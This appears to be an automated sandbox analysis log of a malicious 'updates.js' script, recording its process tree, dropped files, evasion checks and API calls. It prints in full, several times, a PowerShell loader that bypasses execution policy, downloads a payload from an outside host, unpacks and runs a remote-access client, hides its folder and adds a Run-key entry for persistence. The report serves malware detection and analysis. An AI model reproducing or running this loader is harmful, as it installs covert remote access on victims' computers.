                                Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe "C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe "C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe"
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Roaming\GRDCWLLI20\NSM.ini
Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe File opened: C:\Windows\SysWOW64\riched32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: updates.js Static file information: File size 7688860 > 1048576
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\GRDCWLLI20\msvcr100.dll
Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000001.00000002.1816720389.00000170BADE4000.00000004.00000800.00020000.00000000.sdmp, client32.exe
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: powershell.exe, 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Conta
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,InternetQueryDataAvailable,SetLastError,GetProcAddress,SetLastError,FreeLibrary,3_2_11029BB0
                                Source: PCICL32.DLL.1.drStatic PE information: section name: .hhshare
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B92097D push E95B71D0h; ret 1_2_00007FFD9B9209C9
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B927567 push ebx; iretd 1_2_00007FFD9B92756A
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11041721 push 3BFFFFFEh; ret 3_2_11041726
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1116FF15 push ecx; ret 3_2_1116FF28
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11041721 push 3BFFFFFEh; ret 7_2_11041726
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1116FF15 push ecx; ret 7_2_1116FF28
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1116AE09 push ecx; ret 7_2_1116AE1C
                                Source: msvcr100.dll.1.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\msvcr100.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\pcicapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICHEK.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\TCCTL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\GRDCWLLI20\remcmdstub.exe
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,7_2_11128B10
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HQWQTO
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,3_2_11139ED0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,3_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11113380 IsIconic,GetTickCount,3_2_11113380
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,3_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,3_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,3_2_11025A90
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,3_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,3_2_11113FA0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,3_2_11025EE0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,3_2_1115BEE0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,3_2_110241A0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,7_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11113380 IsIconic,GetTickCount,7_2_11113380
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,7_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,7_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,7_2_11025A90
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,7_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,7_2_11113FA0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,7_2_11139ED0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,7_2_11025EE0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,7_2_1115BEE0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,7_2_110241A0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,7_2_11024880
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110B86C0 Sleep,ExitProcess,3_2_110B86C0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110B86C0 Sleep,ExitProcess,7_2_110B86C0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3285
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6584
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeWindow / User API: threadDelayed 425
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeWindow / User API: threadDelayed 7985
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\GRDCWLLI20\TCCTL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\GRDCWLLI20\remcmdstub.exe
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Evaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Evasive API call chain: GetLocalTime,DecisionNodesgraph_3-56463
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Check user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-52775
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe API coverage: 7.8 %
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe API coverage: 2.8 %
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564 Thread sleep time: -12912720851596678s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe TID: 7636 Thread sleep time: -69500s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe TID: 7640 Thread sleep time: -42500s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe TID: 7636 Thread sleep time: -1996250s >= -30000s
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Last function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,3_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,3_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,3_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,3_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,3_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,FindCloseChangeNotification,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102D900
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,7_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1110BD70 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,7_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,7_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,7_2_1106ABD0
                                Source: client32.exe Binary or memory string: VMware
                                Source: powershell.exe, 00000001.00000002.1881774532.00000170D2A59000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: client32.exe Binary or memory string: VMWare
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe API call chain: ExitProcess graph end nodegraph_3-53023
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe API call chain: ExitProcess graph end node
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_11162BB7
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,3_2_110B7F30
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,InternetQueryDataAvailable,SetLastError,GetProcAddress,SetLastError,FreeLibrary,3_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,3_2_1117D104
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,3_2_110934A0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,3_2_11031780
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,7_2_110934A0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,7_2_11031780
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_1116EC49
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError,7_2_110F4990
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11113190 GetKeyState,DeviceIoControl,keybd_event,3_2_11113190
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe "C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe" Jump to behavior
